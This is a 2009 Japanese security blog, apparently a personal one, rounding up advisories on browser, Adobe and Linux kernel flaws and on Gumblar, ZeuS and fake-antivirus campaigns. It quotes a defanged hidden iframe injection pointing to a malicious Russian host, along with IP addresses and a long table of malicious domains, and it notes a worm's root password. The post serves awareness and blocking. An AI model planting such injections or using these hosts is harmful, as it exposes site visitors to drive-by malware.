UnderForge of Lack

2009.11.24 火曜日

Posted in security on 11 月 24th, 2009 by gnome

オペラ記念日
鰹節の日「1（い）1（い）2（ふ）4（し）」
大分県地域ブログの日 (thru じゃんぐる公園)
東京天文台設置記念日 (国立天文台)
進化の日(Evolution Day) (1895年、チャールズ・ダーウィンがイギリスで「種の起源」を出版。)

----------
Opera

オペラの日ってわけでは無いのでしょうが（苦笑）、先日発見された穴を塞ぐセキュリティ・アップデートを含む、Opera10.10(Unity)が発表されました。
Opera 10.10 (Opera Unite) for Windows changelog

Advisory: Error messages can leak onto unrelated sites
Advisory: Heap buffer overflow in string to number conversion

尚、この脆弱性は６ヶ月前に発表された CVE-2009-0689 に起因するもので、KDE, Opera, SeaMonkey 及び K-Meleonにも同一起源の穴がある可能性を指摘されています。
Update: New security notes for KDE, Opera, SeaMonkey and K-Meleon
Mozilla:
Mozilla Foundation Security Advisory 2009-59 -- 2009.10.27

Opera patches 'extremely severe' security hole
Opera 10.10 closes "extremely severe" hole
Over time, it emerged that further libc implementations including OpenBSD, FreeBSD and Mac OS X were also affected. Updates have been released for OpenBSD 4.5, NetBSD 5.0 and FreeBSD 7.2/6.4.

PoCらしきものも出ていますので、Operaを使用中の方は 10.10にアップデートしましょう。（ついでにUniteが付いてきます・苦笑）
Opera Web Browser 'dtoa()' Remote Code Execution Vulnerability

----------
IE6/7

Exploit published for critical IE 7 zero-day flaw
Microsoft has not yet issued an advisory with mitigation guidance.

New critical vulnerability in Internet Explorer
This means that IE users can protect their systems by disabling the Active Scripting settings for the internet zone, although as a result, many web pages will no longer function.
Internet Explorer Layout Handling Memory Corruption Vulnerability 指標:4
Disable support for active scripting for all but trusted websites.
IEには NoScriptのように、サイトごとにJavaScriptの許可・不許可の機能が無い（あるいは、信頼するサイトを１こずつ登録）ので、全部切るか脅威を許容するかどちらかしかないということですね。

Internet Explorer Vulnerability Exploit Detected

尚、この件により VUPENが警戒度を上げるように警告しています。
VUPEN Security - Security Threats Watch 24x7

----------
IE8よ、おまえもか

Major IE8 flaw makes 'safe' sites unsafe
Google said
A Google spokesman confirmed there is a "significant flaw" in the IE 8 feature but declined to provide specifics.
“ We're aware of a significant flaw affecting the XSS Filter in IE8, and we've taken steps to help protect our users by disabling the mechanism on our properties until a fix has been released. ”
IE8使ってないのでよくわかりませんが（笑）、IE8のXSSフィルタはブロックするのではなく、脆弱性のあるコードを自動的にre-writeするもので、この部分を悪用した攻撃の可能性が示唆されています。
発見したのがGoogleというのも、いろいろありそうですが・・

----------
Firefoxにも・・

Firefox: Heat and the CPU usage problem
Firefox has a CPU usage issue and, consequently, can cause overheating problems in some laptops, particularly ultraportables. That's what I've found over the last couple of years.
Firefoxが一部のラップトップ機のリソースを喰いすぎて、加熱状態を発生させているという指摘

Firefox consumes a lot of CPU resources

----------
ohshit

下品でごめんなさい・・
Password recovery for the latest iPhone worm
Thanks, however, to John the Ripper, I can tell you that the new password is: 'ohshit'.
新しいiPhone Wormによって、rootのパスワードが書き換えられてしまった方、上述のパスワードを試してみてください（苦笑）

----------
ランチョンミート

Spoofed Trend Micro Email Leads to Phishing Site
hXXp://l.trndmcro.com/rts/{BLOCKED}
うちには来てないので、そんなにメジャーじゃないのでしょうが・・

Phishers Playing Games?
コレ、何のゲームでしょ？（笑）

ZeuS
Zeus' Social Security Statement Spam Campaign
UAB Spam Data Mine finds Social Security Statement Zeus Bot -- GarWarnar
&
Fake Flash Player Zbot spread by "Your Domain" -- GarWarnar
ますます巧妙化、多様化するZeuS攻撃

----------
穴ぼこ

[IN ZERO DAY]
Outreach Project Tool "CRM_path" File Inclusion Vulnerability 指標:4
Outreach Project Tool 最終リリース:2006-09-10

[IN ZERO DAY]
PHP Traverser "GLOBALS[BASE]" File Inclusion Vulnerability 指標:4
PHP Traverser 最終リリース:2004-03-17

----------
DSN-BH

HUGE UPDATE: 4900+ Domains removed
Older domains from 2008, which no longer seem to be associted with malware — over 4900 — have been removed.
(Don’t worry, plenty of new domains will be added in the coming weeks…)

ブラックリストは、追加は楽なんですが、削除の基準とかが大変ですよね。

----------
Google vs (Steve Ballmer & Rupert Murdoch)

Microsoft、マードックと話し合い―本気でBingのためにニュースを札束で買おうとしているのか？
本気（正気）かしらん？
まぁ、お金と権勢を持ってるとこがナリフリ構わない手段に出るとどうなるかはわかりませんが・・・

Murdoch-Microsoft Deal In the Works

----------
| 1259006414 | B | [goog-black-hash 1.45079 update]
| 1259006402 | M | [goog-malware-hash 1.17404 update]
| 376445 |(-1546 : 377961)
| 1036320 |
EoF

Leave A Comment »

2009.11.19 解禁日

Posted in security on 11 月 19th, 2009 by gnome

さぁ Diggin! 890円

緑のおばさんの日 (学童擁護員)
農協記念日 (1947年農業協同組合法公布)
鉄道電化の日
世界トイレの日(World Toilet Day)
ペレの日

----------
Windows7対応セキュリティソフト１０選

Windows 7用のセキュリティ対策ソフトウェア10選
MSEが最後に回されているのに恣意的なものを感じないでもなかったり（笑）
Windows 7 consumer security software providers

Aviraがどこにもいないのはなぜ？とか思ったり・・・

----------
Massive injection(*repeated*)

また Massive なんですが・・
Thousands of web sites compromised, redirect to scareware
over 200,000 compromised web sites
となってますが、自動で作成された誘導用の悪意blogのような感じです。
Inst_58s6.exe 1/41 (2.44%)
インジェクションは css.js (Trojan-Downloader.JS.FraudLoad 7/41 (17.07%))
Original Report:
Google Search Results Significantly Poisoned -- Cyveillance

premium-protection6.com
file-antivirus3.com
checkalldata.com
foryoumalwarecheck4.com
antispy-scan1.com

Meteor Shower and New Moon Lead to FAKEAV
これも、FakeAVの画面が良く似ているので同様の手口なのでしょう。
Security Tool

ところで、こんな検索方法があるのは始めて知りました。
allinurl:bmsblog/category
Advanced Operators
検索のヒント --

----------
Quickly Block Warning from DNS-BH

Block ueopen .com ASAP
Block the domain ueopen .com ASAP.
Source:
SPEAR PHISHING E-MAILS TARGET U.S. LAW FIRMS AND PUBLIC RELATIONS FIRMS
日本人向けではないですが・・・

ついでに、ブロックマニアのヒトに捧ぐ
Rogue domains, phish domains, scareware domains added -- nov.17
Sources include www.tech-linkblog.com, blackip.ustc.edu.cn:

----------
お金がもらえるようです

Payment request for XXXXX - Sasfis
なにやらお金がもらえるそうです。
でももらえるのはこれです。Sasfis。
module.zip 29/41 (70.73%)

遠慮しておきましょう・・・

Payment Request Spam Contains Malware
TROJ_AGENTT.WTRA

----------
微妙に時間切れです。

コメントで
Milw0rmのstr0ke氏の死はfakeであるという話
Ikeeワームでロック解除のRansom-Feeを要求したのは別のハッカー（オランダ）だったという話
wmiprvse.exeの詳細の話
を頂きました。ありがとうございます。

今日着で、あまり読んでない記事は：

Apathy, Not Architecture, at Root of Attacks
Senate Panel: 80 Percent of Cyber Attacks Preventable
無関心と非合理的な妄信が攻撃を呼ぶ・・・
というか、いまだにXPでセキュリティツール無しってユーザがどれだけいることか・・（嘆息）

アフリカ諸国を結ぶ高速インターネット
The link between high speed and cybercrime
インフラが整備される速度と、セキュリティ的な知識・啓蒙が進行する速度は比例していません。
しかし・・2400b(Bではない)psとか今の世界では考えられませんね（笑）

ZeuS/Zbotの一般紙的な見解
Two held in global PC fraud probe
Symantec的見解：Zeus: King of the Bots

公表するもの、しないもの・・
Gumblar攻撃再開～被害は1250サイトに拡大、多数の国内サイトが被害に

 「Windows 7」のアクティベーション回避法が発見される

 Using a Cisco Router as a “Remote Collector” for tcpdump or Wireshark
But if the traffic you are trying to capture is halfway across the world (or maybe closer but still too far to drive), can you use your router to capture packets in a standard libpcap format?
ごめんなさい。できません（苦笑）
というか、パケットスニフまで日常業務でやってるとこって多いんですかネ？

携帯電話は安全か？　「初のiPhoneワーム」に学ぶ教訓 (1/2)
残念なことに、「Windows PCではなくiPhoneを使っているから安全だろう」と信じている人はあまりにも多い。

その金はマイクロソフトが出すんですかね？
打倒Googleの秘策：「有力サイトにカネを払ってGoogleへの登録を削除してもらう」
検索上位1000サイトに各100万ドルを支払う
関連?：「新聞は…」―いやはや、Googleの検索候補は笑える

そういえば・・・Authorwareなんてものもありましたね・・AdobeもMacromediaも買収するだけして、放置コンテンツがかなりあるような・・PageMaker, Persuasion(Aldus), AfterEffects(CoSA)とか・・

----------
| 1258574414 | B | [goog-black-hash 1.44719 update]
| 1258574403 | M | [goog-malware-hash 1.17284 update]
| 370232 |
| 1004375 |
祝（えない！） BlockLog 1,000,000 突破
EoF

Leave A Comment »

2009.10.27 火曜日（たぶん）縮刷版

Posted in security on 10 月 27th, 2009 by gnome

読書の日(読書週間初日)
世界新記録の日(世界記録)
テディベアズ・デー

----------
[EMERGENCY]
言うまでも無く攻撃続行中なわけなんですが、何しろ今回はC&Cがはっきりしないので、Fast-Fluxを一つづつ潰していくしか対処法が無いんです。

で・・いつ記事になるかな～とかワクワク期待していた so-netさんが・・・・
Gumblar再襲来(1) 国内サイトも多数改ざん～以前の改ざんサイトが再改ざん
 Gumblar再襲来(2) 「攻撃サイト」も一般サイト/カスペルスキーが確認と警告
 Gumblar再襲来(3) Adobe Reader/Flash/IE/Office、攻撃は最新版でブロック
 Gumblar再襲来(4) ゲームサイトや競馬サイトが相次ぎ改ざん報告
 Gumblar再襲来(5) 感染でパソコン起動せず、サポート窓口に電話殺到

一気に５連弾（笑）気合入ってます
ちなみに Kates は Avira/BitDefender/Kaspersky の検出シグネチャ名称で、Daonolの別称と思ってください。
trojan.zip -- 2009.10.26 07:53:34 (UTC) 23/41 (56.10%)
Trojan-PSW.Win32.Kates.j, Lando

黒い画面にマウスカーソル (Win32/Daonol)
こうして各PCベンダーが一斉にウィルスによる機能回復の手順を出すような事態は相当深刻だと思うのですが、どのくらいの実害が発生しているのかはよくわかりません。

何度も同じコトを言って恐縮ですが、感染したＰＣからPasswordの変更をしないようにしましょう（何度でも盗まれ、再度改ざんされます）

----------
Guardian Down

英ガーディアン紙は中堅の一般紙ですが、その求人サイト Guardian.Jobs がクラックされた模様(USAのサイトは影響なし）・・・
UK newspaper Web site hacked; 500,000 job-seekers affected
登録ユーザの個人情報のうち最大で500,000件が流出した可能性があると発表されています。

Guardian Jobs Security Update

クラッキングの経路などは現時点では不明です。

----------
IPv6関連の脆弱性

IPv6 を実装した複数の製品にサービス運用妨害 (DoS) の脆弱性
IPv6 を実装した複数の製品には、Neighbor Discovery Protocol (RFC4861) に関連したパケットの処理に問題があります。細工されたパケットの処理に起因するサービス運用妨害 (DoS) の脆弱性が存在します。

参考：
IPv6 Secure Neighbor Discovery: Protecting Your IPv6 Layer 2 Access Network

影響下にある製品
IPv6のNDP実装におけるサービス運用妨害（DoS）の脆弱性 -- 古川電工
FITELnet-F80 ×（V01.02(00)以降）
FITELnet-F100 ×（V02.06(00)以降）
FITELnet-F120
FITELnet-F1000 ×V02.06(00)以降）
FITELnet-F2000 ×

IPv6対応製品にDoSの脆弱性、IPAらが注意喚起

IPv6は全然わかってないので、勉強しておきます（苦笑）

----------
IPv6 と 6to4プロトコル

IPv6 Tunneling Protocols: Good for Adoption, Not So Hot for Security
新技術に移行するに当たって様々なセキュリティ的懸念が発生するのは当然のことですが、なかなか知識が追いつきません。

Teredoとは
Teredoとは，Windows Vista端末からIPv6インターネットへの接続を試せる技術の一つ。IPv4のネットワーク経由でIPv6パケットを転送するトンネル技術を使ってIPv6インターネットへ接続する。

Again, I don’t want to scare anyone off. Just know the risks, and take appropriate precautions.

----------
検索するとマルウェアに遭遇する（確率の高い）キーワード

ネット検索で危険なセレブの日本版、マカフィーが報告
 インターネット検索で最も危険な日本の有名人は? - マカフィー調査

もっとも、McAfee SiteAdvisorの信頼度の方はアレですが・・・
いちおう、MDL/MalwareURL等からの危険情報を（たぶんボランティアで）転記している方はいらっしゃるようですが、反映が遅い遅い・・・
このサイトは検査待ちです。自動検査の結果が出るまでしばらくお待ちください。

この辺は、NortonSafeWeb あたりも同じ問題を抱えています。
バッサリと危険リストに投げ込んで（血のように）真っ赤な警告ウィンドウを出す Googleセンセイのような迅速さが要求されているのではないでしょうか？（苦笑）

----------
エイリアン vs プレデター
じゃあるまいし・・・

DHLやらUPSやらの荷物不達メールに変なTrojanを添付している Bredolabですが、Botnetの雄（イヤな雄ですが・・）である Zbotにケンカをうっている模様・・・
Bredo vs. Zeus: The Battle of the Bots continues
We have seen bots go toe-to-toe with one another before; embedding logic into their armory to block or disable other malware. As such, it comes as no surprise to have seen a recent Bredo sample with additional code to disable installed Zbots. The sample loops through the list of known Zbot executable names…

Botに感染するようなガードの甘いパイはそれなりに少なくなってきているので Botnet同士でパイの奪い合いでもしてるんでしょうか？（嘆息）
もっとも、この両者はイロイロ類似点も多く、単にBredlabの作者（グループ）がZbotの内部を知り尽くしているだけなのかもしれませんが

で、そのZbotですが、MDLのアナリストがインジェクションにこんなメッセージが入っているのを見つけたそうです。
iframes are EVIL! Hate Zeus!
えーっと、何でしたっけ？
「お前が言うな！」
かな？

----------
SUN Java system web server

Sun Java System Web Server Unspecified Buffer Overflow
指標:4 High-Critcal
（いつもの）バッファ・オーバーフローとそれに伴う任意コード実行の可能性です。
The vulnerability is reported in version 7.0U6. Other versions may also be affected.
緩和策等の指示はありません。
Due to the very limited available information, it is not possible to suggest an effective workaround.
とりあえずベンダーの報告待ちですかネ？

----------
Day 25 -- 80 and 443

お馴染み過ぎるPort番号ですが、故に見落としがちな部分もあります。
Cyber Security Awareness Month - Day 25 - Port 80 and 443
インターネット（笑）に普通に接続していると、80および443のセッションは山のように存在し、おそらくはそのパケットの精査などはやっていないでしょう。
しかし、Malware: When  become commands --2006.02 のようにHTMLコメントに偽装したコマンドなどもあり、完全に信頼できるものなど存在しないと警告しています。

ちなみに、ウチは TCP Monitor Plusのセッションモニターを常に表示して、妙なセッションが張られてないかを気が向いたら監視（というか漠然と見）していますが、コンナノではダメなんでしょうね・・・・

----------
Day 26 -- port1433/1434 MSSQL

Cyber Security Awareness Month - Day 26 port1433/1434 MSSQL
Port 1433 together with port 1434 are the ports most associated with MSSQL or to security people as the Slammer ports.
SQL Slammer Wormの悪夢の話ですね。

----------
DNS-BH New List

10/25 update: 114 new domains blocked
114 new domains added. Sources www.malwareurl.com, tech-linkblog.com, malwaredomainlist.com and others:

and..
rapidshare.com was delisted. （笑）

----------
Firefox 3.6は自動更新？

モジラ、「Firefox 3.6」をマイナーアップデートに位置づけか？--幹部が示唆
 Firefox 3.6が3.5からの自動更新で提供される可能性高まるそして、Smedberg氏がわずかに言及しているが、Firefox 3.7 / 4.0の開発をしながら、Firefox 3.5 / 3.6のメンテナンスを続けることによって生じるコストを減らしたいのだ。3.6に一本化できれば、コストはかなり低下する。そうはいっても、このような開発者側の事情が、膨大なユーザーに対し、一時的とはいえかなりの不便を強いることを正当化できるだけのものといえるのか、疑問は残る。

エンジン Gecko 1.9.2はかなり変更されているということでしたので、大丈夫なのかな？という気もしますが、このあたりは多くの開発者の主張を統合しなければならないMozillaと、トップダウンでヤレ！とできる Google(Chrome)の違いなんでしょうね・・たぶん。

----------
Symantec的に・・・

Honor Among Thieves? Definitely Not.
46.9% Norton Antivirus
って部分が一番アタマにきてるのではないかと？（笑）

※注意
Windows Enterprise Defenderは偽アンチウィルスです。

----------
セカイカメラ・テロ

姉ヶ崎寧々エアタグテロ
 ラブプラス
これだったのか～!

----------
Google Safe Browsing STATUS:
| 1256587204 | B | [goog-black-hash 1.43063 update]
| 1256587202 | M | [goog-malware-hash 1.16734 update]
| 327070 | current blocked
| 857106 | total logged
EoF

Leave A Comment »

2009.10.09 金曜日

Posted in Announce, security on 10 月 9th, 2009 by gnome

世界郵便デー／万国郵便連合記念日
1874年10月9日に、全世界を一つの郵便地域にすることを目的とする万国郵便連合(UPU) がスイスで結成されたことに由来。
そういえば政治の世界でも何かモメてましたね
トラックの日
「10」（ト）と「9」（ク）
東急の日
10 + 9ベタだ・・・
秋の八幡祭（高山祭）
　櫻山八幡宮
 チェ・ゲバラ(エルネスト・ラファエル・ゲバラ・デ・ラ・セルナ) 1967年銃殺される

----------
AdobeがReaderとAcrobatに（何か）があると発表

[IN ZERO DAY]マタカ
何かじゃわからん！ってですか？（苦笑）
Adobe Releases Security Bulletin for Critical Vulnerability
Adobe has released security bulletin APSB09-15 to alert users of a critical vulnerability in Adobe Reader and Acrobat. Adobe indicates that it has received reports of active exploitation of this vulnerability. Release of an update for this vulnerability is scheduled for Tuesday, October 13.

Security Advisory for Adobe Reader and Acrobat
There are reports that this issue is being exploited in the wild in limited targeted attacks; the exploit targets Adobe Reader and Acrobat 9.1.3 on Windows. Adobe Reader and Acrobat 9.1.3 customers with DEP enabled on Windows Vista are protected from this exploit. Disabling JavaScript also mitigates against this specific exploit, although a variant that does not rely on JavaScript could be possible. In the meantime, Adobe is also in contact with Antivirus and Security vendors regarding the issue and recommends users keep their anti-virus definitions up to date.
・既に攻撃が確認されている
・Acrobat 9.1.3で Vistaユーザで DEPが ONになっているユーザだけはこの攻撃を受けない
・JavaScriptをOFFにしても攻撃を回避できない

CVE-2009-3459(*reserved)
何もわかりません（苦笑）

scheduled for release on October 13
１３日までゼロデイっと

Adobe Acrobat Reader Remote Code Execution Vulnerability
Adobe Reader and Acrobat Advance Notification Multiple Unspecified Security Vulnerabilities
PoCはまだ無い模様
発見、報告したのは Chia-Ching Fang氏 (ICST.tw)です。

えーっと、どうすればいいんでしょうね（苦笑）

Vistaの人は Acrobat/Readerが 9.1.3で、DEPが有効になっていることを確認してください
そうでない人は 10/13 まで、信用できない PDFを開かないようにしましょう。
(Foxitあたりが安全である保障もありません)

New Adobe Vulnerability Exploited in Targeted Attacks
This vulnerability does not require Javascript. If you disabled Javascript in the past, it will not protect you in this case.
JavaScriptに全く関係ないわけですね・・・
Another workaround I found helpful: You can "clean" PDF documents by first converting them into another format (like Postscript) and then back into PDF. However, this is not 100% certain to remove the exploit and you may infect the machine that does the conversion as it will likely still use the vulnerable libraries to convert the document. But the likelyhood of this happening is quite low.

PDFを１回EPSか何かに保存し、もっかいPDFに戻せと・・・
でも、脆弱性ライブラリを残したコンバータを使ったら意味が無いと（レア・ケースらしいですが）・・・・

Acrobatなどに未解決の脆弱性、米13日にパッチ公開
米国時間の13日にはReaderとAcrobatの複数の脆弱性を解決する四半期パッチの公開を予定しており、今回の脆弱性もこのパッチで対処する方針。それまでの間、ゼロデイ攻撃を回避するためにJavaScriptを無効にするなどの対策を紹介している。
JavaScriptを無効にしてもダメだって書いてある気もするんですけど・・・？

----------
Microsoft Patch(TM) at October

October 2009 Bulletin Release Advance Notification
For October we are releasing 13 bulletins (eight critical and five important), addressing 34 vulnerabilities, affecting Windows, Internet Explorer, Office, Silverlight, Forefront, Developer Tools, and SQL Server. Most of these updates require a restart so please factor that into your deployment planning.

えーっと
８の致命的修正
５の重要修正
ってコトですかネ

SMBv2の問題と、IISのFTP経由攻撃の問題の修正を含んでいるようです。

Adobeの修正と同じ Oct.13 (日本では14日・水曜日頃）を予定しています。

----------
逆転無罪

Winny 開発者の金子勇氏、無罪判決

とりあえずはお疲れ様でしたって感じでしょうか
（上告されそうですが・・）
Winny開発者の無罪判決は「意外であり疑問」、ACCSがコメント

そして・・・
Winnyウイルスでかんぽ生命の顧客情報が流出、1万3500件超の規模
あーあ・・
簡易保険システム

----------
Day 8th -- Port 25

Cyber Security Awareness Month - Day 8 - Port 25 - SMTP

SMTP(Simple Mail Transfer Protocol)で使用される標準ポート。
最近は OP25B(Outbound Port 25 Blocking)により、ISP側で特定のサーバ以外の送信をブロックしていることが多いと思います。更に IP25Bによって、非固定IPからの25番受信を拒否するケースも増えています。
それでもspamは一向に減らないわけですが・・・

----------
Koobface ８つの謎

8 Things You Probably Didn’t Know About KOOBFACE

ふむふむ・・
というか、Facebookのユーザが国内にあまり居ないのでピンとこない部分が多いです。

----------
DNS-BH updated

[Block List]
New Update: trojans, rogues, zeus domains
ZeuS/Zbotのドメインが相変わらず増加の一途をたどっています。

----------
Compromisted

Isuzu Turkey Web Site Compromise

いすゞのトルコ法人のサイトが陥落、iframeインジェクションを受けていた模様です
現時点でリダイレクト先は接続不能。

最近このタイプのインジェクションがあちこちで見受けられます。

----------
WOT ride on Chrome

WOT for Google Chrome Web browser
Web上のアドレスリンクに危険、安全の指標を付けるプラグイン Web of Trust がついに Chrome に対応しました。

GSB（標準実装）と併せて、更に安全なサーフィンを行えることでしょう。（タブンネ）

----------
バルマ～

バルマー氏、マイクロソフトのライセンシングは複雑すぎると認める

ほんとに何とかしてくださいよ（苦笑）

----------
台風一過

Google Safe Browsing STATUS:
[goog-malware-hash 1.16304 update]
[goog-black-hash 1.41766 update]
Results: 337447 (-1946)
※収集した過去感染履歴を含むと、現在 : 749691

EoF

Leave A Comment »

[Notice] 8080 インジェクション陥落サイトが日本国内で確認

Posted in security on 9 月 24th, 2009 by gnome

IRCとMailで指摘を受けてごそごそ調査していましたが、裏取りが終わりましたのでちょっとレポ

某タレントのBlogが攻撃を受けているという情報が飛び交い始めたのが 9/18 頃の話で、キャッシュを探したのですが、見つけられませんでした。
しかし、中国の悪名高い Baidu-Spiderのキャッシュに
＜iframe src="hXXp://soul-of-man.ru:8080:8080/ts/in.cgi?sony" width=650 height=0 style="visibility: hidden"＞＜/iframe＞
という文字列が残されていました。

なんで8080を二重に設定してるのかは謎ですが、同様のインジェクションは他にも見つかりますので、恐らく自動で差し込まれたものでしょう。
あと、sony ってのも謎ですね（笑）

IP:

80.69.74.73		TransIP B.V
85.17.237.5		LEASEWEB
91.121.7.26		OVH ISP Paris
91.121.121.6
91.121.134.229

TranceIPは新顔ですね

既に何度も紹介しているように、汚染の手口は旧態依然のものです。
Microsoft(Windows) Update
Adobe (Acrobat) Reader
Adobe Flash Player
Mozilla Firefox
を常に最新にしておけば感染することはありません。

この攻撃が本当に Gumblar/GENO のものなのかどうかは確証がありませんが、8080インジェクションが同じグループに関係が深いことは様々なセキュリティ機関が指摘しています。
個人的な感想を言えば Gumblarのような緻密さが感じられないのですが・・・
※難読化も分割も行っていないストレートな方法です。

IP 80.69.74.73 収容のドメイン群・・・
収容されているIP群はおなじみのものも多数存在します。

18-plus.ru	not yet	THROUGH
39u.ru	638	BLOCKED
3b4.ru	96	BLOCKED
3bf.ru	561	BLOCKED
3cw.ru	437	BLOCKED
80-69-74-73.colo.transip.net	not yet	THROUGH
a5h.ru	295	BLOCKED
a5i.at	17	BLOCKED
age-bio.ru	1094	BLOCKED
age-inf.ru	not yet	THROUGH
autobestwestern.cn	90days ago	BLOCKED
beachhousename.cn	747	BLOCKED
bestfindit.cn	90days ago	BLOCKED
betworldwager.cn	89	BLOCKED
bigtopcabaret.cn	90days ago	BLOCKED
bigtopcreative.cn	546	BLOCKED
bigtopfestival.cn	84	BLOCKED
bigtopliteworld.cn	90days ago	BLOCKED
bigtoplotto.cn	205	BLOCKED
bigtopstudios.cn	452	BLOCKED
bio-a.ru	0(benign)	THROUGH
bio-age.ru	not yet	THROUGH
c1z.at	587	BLOCKED
c8k.ru	312	BLOCKED
c8t.ru	not yet	BLOCKED
casinoslotbet.cn	488	BLOCKED
ce5.ru	254	BLOCKED
ciqx.in	465	BLOCKED
coolnamemart.cn	581	BLOCKED
dima-bilan-gey.ru	not yet	THROUGH
dub-dubom.ru	not yet	THROUGH
f6e.ru	201	BLOCKED
findbigthinker.cn	90days ago	BLOCKED
gasa.in	4	BLOCKED
giantbest.cn	201	BLOCKED
giantnonfat.cn	90days ago	BLOCKED
hugetopnonfat.cn	183	BLOCKED
inhouselabel.cn	30	BLOCKED
iq-mozgi.ru	not yet	THROUGH
liteautorepair.cn	90days ago	BLOCKED
litefinestdirect.cn	94	BLOCKED
litetopfindguide.cn	746	BLOCKED
liteupyourride.cn	220	BLOCKED
lotmachinesguide.cn	445	BLOCKED
mixmediadirect.cn	428	BLOCKED
mybetsportswager.cn	347	BLOCKED
namecompanystore.cn	11	BLOCKED
nameshopinternational.cn	131	BLOCKED
namezeroshop.cn	377	BLOCKED
nonfathighestlocate.cn	349	BLOCKED
ns5.litetopdetect.cn	90days ago	BLOCKED
pornomig.ru	not yet	THROUGH
professional-test.ru	not yet	THROUGH
q0w.ru	308	BLOCKED
q3o.ru	183	BLOCKED
q5n.ru	90days ago	BLOCKED
rbgt.in	179	BLOCKED
russkitrax.ru	not yet	THROUGH
shoppicturelife.cn	422	BLOCKED
superorgazm.ru	not yet	THROUGH
t-age.ru	not yet	THROUGH
test-health.ru	not yet	THROUGH
thehomename.cn	156	BLOCKED
u1x.ru	90	BLOCKED
u3h.ru	363	BLOCKED
u6v.ru	124	BLOCKED
u8v.ru	101	BLOCKED
ultralitecar.cn	424	BLOCKED
uppd.in	284	BLOCKED
www.inhouselabel.cn	30	BLOCKED
www.litecarfinestsite.cn	216	BLOCKED
www.u8r.ru	266	BLOCKED
www.xg8.ru	150	BLOCKED
x0c.ru	524	BLOCKED
x0v.ru	596	BLOCKED
x3a.ru	336	BLOCKED
x3b.ru	539	BLOCKED
x6h.ru	2	BLOCKED
x7d.ru	2349	BLOCKED
x8n.ru	1323	BLOCKED
x8y.ru	122	BLOCKED
x9d.ru	1	BLOCKED
x9f.ru	1494	BLOCKED
x9m.ru	579	BLOCKED
x9v.ru	112	BLOCKED
xb4.ru	90	BLOCKED
xc6.ru	113	BLOCKED
xg8.ru	150	BLOCKED
xj4.ru	143	BLOCKED
xq1.ru	90days ago	BLOCKED
xq8.ru	90days ago	BLOCKED
xv8.ru	90days ago	BLOCKED
xv9.ru	509	BLOCKED
yourlitetopfind.cn	90days ago	BLOCKED
zeyc.in	235	BLOCKED

Leave A Comment »

2009.08.15 土曜日

Posted in security on 8 月 15th, 2009 by gnome

お盆
 終戦の日
 玉音放送により戦争終結が国民に通知された日であり、実際の終戦の日は 9/2のUSS Missouri上での降伏文書調印の日を差すことになっている。

----------
[ATTENTION]
Linux NULL pointer dereference due to incorrect proto_ops initializations (CVE-2009-2692) vulnerability
Edward alerted us to a new Linux vulnerability coming from how Linux deals with unavailable operations for some protocols.
All Linux 2.4 / 2.6 versions since May of 2001 are believed to be vulnerable.
※注意
SANSに張ってある Detailsへのリンクは、怪しげな 0,0 iframeが有りますので注意してください。 WOT評価 = archives.neohapsis.com

Linux NULL pointer dereference due to incorrect proto_ops initializations (CVE-2009-2692)

Linux: Local Privilege Escalation On All Linux Kernels

Secuniaの危険度指標は２段階目の Less critical
Linux Kernel 2.4 Incorrect proto_ops Initialisation NULL Pointer Dereference

RedHatの緩和策指標：
Bug 516949:CVE-2009-2692 kernel: uninit op in SOCKOPS_WRAP() leads to privesc
Mitigation:
It is possible to mitigate this flaw by blacklisting the affected protocols.
Note that this is not an exhaustive list of modules to blacklist, but this should prevent the publicly circulated exploit from working properly as this is the list of protocols (relevant to RHEL) known to be affected.

** Ensure that the module is not already loaded, if not, these mitigation steps will not work.

** We have used the 'install' command to direct the system to run '/bin/true' instead of actually inserting the kernel module if it is called.

** On Red Hat Enterprise Linux 3, add this entry to the end of the /etc/modules.conf file:
install bluez /bin/true
Note that the bluez module is from the kernel-unsupported package. If you do not have this package installed, then you do not have this module.

** On Red Hat Enterprise Linux 4 and 5, add these entries to the end of the /etc/modprobe.conf file:
install pppox /bin/true
install bluetooth /bin/true

** On Red Hat Enterprise MRG, add these entries to the end of the /etc/modprobe.conf file:
install pppox /bin/true
install bluetooth /bin/true
install appletalk /bin/true
install ipx /bin/true
install sctp /bin/true

Linuxカーネルに8年前から潜む脆弱性をGoogle Security Teamが発見

また、Milw0rmには別の脆弱性もHILIGHTEDされています。

may want to remove the __attribute__((regparm(3))) for 2.4 kernels,
I have no time to test

hm... does this exploits disable also tomoyo (on < 2.6.30 kernels)?
I dunno!

RedHatは昨日、RHEL4系Karnelのアップデートを発表したばかりなのですが、今回の脆弱性は見過ごされていたとの指摘があります。
Important: kernel security and bug fix update

CVE-2009-1389
kernel: r8169: fix crash when large packets are received
CVE-2009-1439
kernel: cifs: memory overwrite when saving nativeFileSystem field during mount
CVE-2009-1633
kernel: cifs: fix potential buffer overruns when converting unicode strings sent by server

いずれにせよ、もう少し情報収集が必要でしょうか？

----------
DHA?

×ドコサヘキサエン酸
○Directory Harvest Attack

スパム業者のアドレス収集攻撃が多発、Symantecが警戒を呼び掛け
DHAは特定のドメインあてに無作為の件名や内容のメールを何通も送りつける攻撃のこと。受信側の電子メールサーバを通過したアドレスはすべて有効と見なされ、スパム送信用のアドレス帳データベースに登録されてしまう。

How Do They Know My Email Address?
Sample #1: --------------------------

From: joannjasmin8xs@xxxxxx.com
Subject: land

Those journalists showed them a photograph.

Sample #2: --------------------------

From: clariceboldin9cg@xxxxxx.com
Subject: okay then

They told her the shortest way.

うちのメールボックスにも有りました（苦笑）

----------
マルウェアの52%の寿命は24時間以内

52 Percent of New Viruses Last Only 24 Hours, According to PandaLabs
The reason for this lies in hackers’ motivation to profit financially from malware and the goal of ensuring their creations go unnoticed by users and security solution vendors. Just 24 hours after hackers put any strain of malware into circulation, they will modify its code so that malware can continue to spread without being detected by security companies.

理由ははっきりしています。ハッカーの動機はマルウェアによって金銭的な利益を出すためであり、ユーザにもセキュリティ会社にも知られないうちに事を遂行することを目標としているからです。２４時間後には、あらゆるマルウェアが次の循環の亜種に差し変わっており、セキュリティ会社の検知を潜り抜けて広まり続けています。

いたちごっこが永遠に続くのかな・・・？

----------
Firefox 3.0.x user へのお知らせ

Firefox 3 about to get a major update

そろそろ 3.5も安定してきましたので、まだ 3.0.13の方は乗り換えてみてはいかがでしょうか？
もちろん、
Look Glen To Meな Google Chrome や
iTunesを入れると勝手に入られる Apple Safari や
最近なにかと忘れられる Opera なども視野に入れましょう。

あれ？何か１こ足りませんか？（笑）

----------
英労働党の議員のサイトがクラック・・・

Labour MP gives me, Google and the world her password

